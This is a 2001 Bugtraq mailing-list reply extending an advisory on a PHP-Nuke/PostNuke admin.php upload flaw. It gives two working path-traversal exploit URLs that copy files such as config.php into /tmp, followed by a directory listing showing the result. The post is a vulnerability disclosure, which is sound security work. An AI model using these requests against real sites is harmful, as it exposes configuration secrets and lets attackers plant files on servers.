[22730] in bugtraq
Re: twlc advisory: all versions of php nuke are vulnerable...
daemon@ATHENA.MIT.EDU (Paul Starzetz)
Tue Sep 25 13:22:02 2001
Message-ID: <3BB06D35.595F93A3@starzetz.de>
Date: Tue, 25 Sep 2001 13:40:37 +0200
From: Paul Starzetz <paul@starzetz.de>
MIME-Version: 1.0
To: supergate@twlc.net,
"bugtraq@securityfocus.com" <bugtraq@securityfocus.com>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
supergate@twlc.net wrote:
> Summary
> This time the bug is really dangerous...it allows you to 'cp' any file on
> the box... or even upload files...
and even copy outside the postnuke path:
http://somehost/nukepath/admin.php?upload=1&file=config.php&file_name=hacked.txt&wdir=/../../../../../../../tmp/&userfile=config.php&userfile_name=hacked.txt
or for example:
http://somehost/nukepath/admin.php?upload=1&wdir=/../../../../../../../tmp&userfile=/../../../../../../../tmp/copyme.txt&userfile_name=/../../../../../../../tmp/hacked.txt
root@somehost:/tmp > ls -la
total 20
drwxrwxrwt 8 root root 2048 Sep 25 13:37 .
drwxr-xr-x 19 root root 2048 Feb 28 2001 ..
drwxrwxrwt 2 root root 2048 Mar 6 2001 .X11-unix
-rw-r--r-- 1 root root 851 Sep 25 13:37 copyme.txt
-rwxr-xr-x 1 wwwrun wwwrun 851 Sep 25 13:37 hacked.txt
...
Postnuke breaks with elemntary secure coding practices...
/ihq
